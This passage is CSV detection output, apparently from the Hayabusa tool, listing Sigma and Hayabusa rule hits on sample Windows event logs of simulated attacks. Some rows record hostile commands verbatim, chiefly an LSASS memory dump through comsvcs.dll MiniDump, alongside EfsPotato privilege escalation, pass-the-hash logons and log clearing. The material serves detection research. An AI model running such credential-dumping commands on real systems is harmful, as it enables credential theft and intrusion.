remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx 
-2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts 
Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx -2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx -2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: 
OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx -2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx -2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : 
User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS 
dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to 
Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY 
(process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump 